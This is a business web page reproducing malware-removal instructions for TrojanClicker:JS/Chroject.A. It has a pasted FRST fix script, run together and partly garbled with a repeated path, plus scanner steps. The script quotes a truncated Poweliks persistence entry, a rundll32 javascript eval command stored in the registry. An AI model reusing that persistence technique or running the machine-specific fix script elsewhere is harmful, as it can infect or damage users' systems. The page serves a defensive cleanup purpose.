Primary Computer Service, Inc.

Serving Houston Since 1984!

Stop Hacking with a Hardware Firewall

Book Service Call Now

713-827-1300

TrojanClicker:JS/Chroject.A

TrojanClicker:JS/Chroject.A

Removal

STEP 1
xlK5Hdb.png Farbar Recovery Scan Tool (FRST) Script

  • Press the Windows Key pdKOQKY.png + r on your keyboard at the same time. Type Notepad and click OK.
  • Copy the entire contents of the codebox below and paste into the Notepad document.
     
    start(Google Inc.) C:\Users\Admin\AppData\LocalLow\EmieSiteList\sezovopqwirv\zcvlhkawngzw\Zuyrhtjreygq.exe(Google Inc.) C:\Users\Admin\AppData\LocalLow\EmieSiteList\sezovopqwirv\zcvlhkawngzw\Zuyrhtjreygq.exe(Google Inc.) C:\Users\Admin\AppData\LocalLow\EmieSiteList\sezovopqwirv\zcvlhkawngzw\Zuyrhtjreygq.exe(Google Inc.) C:\Users\Admin\AppData\LocalLow\EmieSiteList\sezovopqwirv\zcvlhkawngzw\Zuyrhtjreygq.exe(Google Inc.) C:\Users\Admin\AppData\LocalLow\EmieSiteList\sezovopqwirv\zcvlhkawngzw\Zuyrhtjreygq.exe(Google Inc.) C:\Users\Admin\AppData\LocalLow\EmieSiteList\sezovopqwirv\zcvlhkawngzw\Zuyrhtjreygq.exe(Google Inc.) C:\Users\Admin\AppData\LocalLow\EmieSiteList\sezovopqwirv\zcvlhkawngzw\Zuyrhtjreygq.exe(Google Inc.) C:\Users\Admin\AppData\LocalLow\EmieSiteList\sezovopqwirv\zcvlhkawngzw\Zuyrhtjreygq.exe(Google Inc.) C:\Users\Admin\AppData\LocalLow\EmieSiteList\sezovopqwirv\zcvlhkawngzw\Zuyrhtjreygq.exe(Google Inc.) C:\Users\Admin\AppData\LocalLow\EmieSiteList\sezovopqwirv\zcvlhkawngzw\Zuyrhtjreygq.exe(Google Inc.) C:\Users\Admin\AppData\LocalLow\EmieSiteList\sezovopqwirv\zcvlhkawngzw\Zuyrhtjreygq.exe(Google Inc.) C:\Users\Admin\AppData\LocalLow\EmieSiteList\sezovopqwirv\zcvlhkawngzw\Zuyrhtjreygq.exeC:\Users\Admin\AppData\LocalLow\EmieSiteList\sezovopqwirvHKU\S-1-5-21-1838106421-2317848846-1109280923-1001\...\Run: [Sweggnoj] => regsvr32.exe /s "C:\Users\Admin\AppData\Local\58f0589f-a561-4667-5773-4c7f2ba23b10\Sweggnoj.dll" <===== ATTENTIONC:\Users\Admin\AppData\Local\58f0589f-a561-4667-5773-4c7f2ba23b10HKU\S-1-5-21-1838106421-2317848846-1109280923-1001\...\MountPoints2: {0cf26b23-0f2f-11e3-a879-a4badbfb40f2} - F:\TL-Bootstrap.exeHKU\S-1-5-21-1838106421-2317848846-1109280923-1001\...\MountPoints2: {0cf26b36-0f2f-11e3-a879-a4badbfb40f2} - F:\TLBootstrap_WPP.exeHKU\S-1-5-21-1838106421-2317848846-1109280923-1001\...\MountPoints2: {0cf26c4f-0f2f-11e3-a879-a4badbfb40f2} - F:\MotoCastSetup.exe -aHKU\S-1-5-21-1838106421-2317848846-1109280923-1001\...\MountPoints2: {1ddb4c7a-db38-11e3-8557-a4badbfb40f2} - F:\VZW_Software_upgrade_assistant.exeHKU\S-1-5-21-1838106421-2317848846-1109280923-1001\...\MountPoints2: {80984420-ab1b-11e3-8f37-806e6f6e6963} - F:\TL-Bootstrap.exeHKU\S-1-5-21-1838106421-2317848846-1109280923-1001\...A8F59079A8D5}\localserver32: rundll32.exe javascript:"\..\mshtml,RunHTMLApplication ";eval("epdvnfou/xsjuf)(=tdsjqu!mbohvbhf>ktds (the data entry has 239 more characters). <==== Poweliks!HKCU\Software\Microsoft\Internet Explorer\Main,Start Page = https://www.yahoo.com/SearchScopes: HKCU - {D1BFB61D-2524-4C81-9F58-085523C23FD2} URL = http://www.search.ask.com/web?tpid=ORJ-SPE&o=APN11405&pf=V7&p2=^BBD^OSJ000^YY^US&gct=&itbv=12.15.1.20&apn_uid=1F5600AD-D1F2-4D2A-A6B5-2B78500AF007&apn_ptnrs=BBD&apn_dtid=^OSJ000^YY^US&apn_dbr=ie_11.0.9600.17207&doi=2014-08-02&trgb=IE&q={searchTerms}&psv=&pt=tb2014-11-05 14:32 - 2014-11-05 14:32 - 00004040 _____ () C:\Windows\System32\Tasks\{29F6539F-318F-3007-3AC4-DDBAB36BDA4B}2014-11-05 14:32 - 2014-11-05 14:32 - 00000000 _____ () C:\Users\Admin\AppData\Roaming\mswjwi.dll2014-10-24 14:41 - 2014-10-24 14:42 - 00000000 ____D () C:\ProgramData\Windows Genuine Advantage2014-10-22 21:59 - 2014-10-27 13:59 - 00000000 ____D () C:\ProgramData\{9A88E103-A20A-4EA5-8636-C73B709A5BF8}C:\Users\Admin\AppData\Local\Temp\APNSetup.exeC:\Users\Admin\AppData\Local\Temp\HiPatchSelfUpdateWindow.exeC:\Users\Admin\AppData\Local\Temp\HiRezLauncherControls.dllC:\Users\Admin\AppData\Local\Temp\install_flashplayer11x32ax_aaa_aih.exeC:\Users\Admin\AppData\Local\Temp\jre-7u45-windows-i586-iftw.exeC:\Users\Admin\AppData\Local\Temp\jre-7u51-windows-i586-iftw.exeC:\Users\Admin\AppData\Local\Temp\jre-7u60-windows-i586-iftw.exeC:\Users\Admin\AppData\Local\Temp\jre-7u65-windows-i586-iftw.exeC:\Users\Admin\AppData\Local\Temp\ose00000.exeC:\Users\Admin\AppData\Local\Temp\SAS6_Update.exeC:\Users\Admin\AppData\Local\Temp\SkypeSetup.exeC:\Users\Admin\AppData\Local\Temp\vymalru.dllCustomCLSID: HKU\S-1-5-21-1838106421-2317848846-1109280923-1001_Classes\CLSID\{AB8902B4-09CA-4bb6-B78D-A8F59079A8D5}\localserver32 -> rundll32.exe javascript:"\..\mshtml,RunHTMLApplication ";eval("epdvnfou/xsjuf)(=tdsjqu!mbohvbhf>ktds (the data entry has 247 more characters). <==== Poweliks?AlternateDataStreams: C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Yahoo!.website:TASKICON_0favicon-2079221766AlternateDataStreams: C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Yahoo!.website:TASKICON_1favicon1313128964AlternateDataStreams: C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Yahoo!.website:TASKICON_2favicon-2092717923Task: {05D3DCA2-B794-4503-A644-5DB08442052E} - System32\Tasks\{29F6539F-318F-3007-3AC4-DDBAB36BDA4B} => C:\Users\Admin\AppData\Roaming\vclcog.dll/s "C:\Users\Admin\AppData\Roaming\vclcog.dll" <==== ATTENTIONC:\Users\Admin\AppData\Roaming\vclcog.dllFolder: C:\Users\Admin\AppDataCMD: ipconfig /flushdnsCMD: netsh winsock reset allCMD: netsh int ipv4 resetCMD: netsh int ipv6 resetEmptyTemp:end
  • Click FileSave As and type fixlist.txt as the File Name
  • Important: The file must be saved in the same location as FRST64.exe. 

NOTICE: This script is intended for use on this particular machine. Do not use this script on any other machine; doing so may cause damage to your Operating System.

  • Right-Click FRST64.exe and select AVOiBNU.jpg Run as administrator to run the programme.
  • Click Fix.
  • A log (Fixlog.txt) will open on your desktop. This log will be very large. Ensure you attach the file in your next reply!
     

STEP 2
GfiJrQ9.png Malwarebytes Anti-Malware (MBAM)

  • Open Malwarebytes Anti-Malware and click Update Now.
  • Once updated, click the Settings tab, followed by Detection and Protection and tick Scan for rootkits.
  • Click the Scan tab, ensure Threat Scan is checked and click Scan Now.
  • Note: You may see the following message, "Could not load DDA driver". Click Yes, allow your PC to reboot and continue afterwards. 
  • If threats are detected, click the Apply Actions button. You will now be prompted to reboot. Click Yes.
  • Upon completion of the scan (or after the reboot), click the History tab.
  • Click Application Logs and double-click the Scan Log.
  • Click Copy to Clipboard and paste the log in your next reply. 
     

STEP 3
BY4dvz9.png AdwCleaner

  • Please download AdwCleaner and save the file to your Desktop.
  • Right-Click AdwCleaner.exe and select AVOiBNU.jpg Run as administrator to run the programme.
  • Follow the prompts. 
  • Click Scan
  • Upon completion, click Report. A log (AdwCleaner[R0].txt) will open. Briefly check the log for anything you know to be legitimate. 
  • Ensure anything you know to be legitimate does not have a checkmark, and click Clean
  • Follow the prompts and allow your computer to reboot
  • After rebooting, a log (AdwCleaner[s0].txt) will open. Copy the contents of the log and paste in your next reply.

-- File and registry key backups are made for anything removed using this tool. Should a legitimate entry be removed (otherwise known as a 'false-positive'), simple steps can be taken to restore the entry. Please do not overly concern yourself with the contents of AdwCleaner[R0].txt.
 
 
 

 

STEP 4
E3feWj5.png Junkware Removal Tool (JRT)

  • Please download Junkware Removal Tool and save the file to your Desktop.
  • Note: If you unchecked any items in AdwCleaner, please backup the associated folders/files before running JRT.
  • Temporarily disable your anti-virus software. For instructions, please refer to the following link.
  • Right-Click JRT.exe and select AVOiBNU.jpg Run as administrator to run the programme.
  • Follow the prompts and allow the scan to run uninterrupted. 
  • Upon completion, a log (JRT.txt) will open on your desktop.
  • Re-enable your anti-virus software.
  • Copy the contents of JRT.txt and paste in your next reply.
     

STEP 5
xlK5Hdb.png Farbar Recovery Scan Tool (FRST) Scan

  • Right-Click FRST64.exe and select AVOiBNU.jpg Run as administrator to run the programme.
  • Click Yes to the disclaimer.
  • Ensure the Addition.txt box is checked.
  • Click the Scan button and let the programme run.
  • Upon completion, click OK, then OK on the Addition.txt pop up screen.
  • Two logs (FRST.txt & Addition.txt) will now be open on your Desktop. Copy the contents of both logs and paste in your next reply. 

 
======================================================
 
STEP 6
pfNZP4A.png Logs
In your next reply please include the following logs. Please be sure to copy and paste the requested logs, as well as provide information on any questions I may have asked.

  • Fixlog.txt (attached!)
  • MBAM log
  • AdwCleaner[s0].txt
  • JRT.txt
  • FRST.txt
  • Addition.txt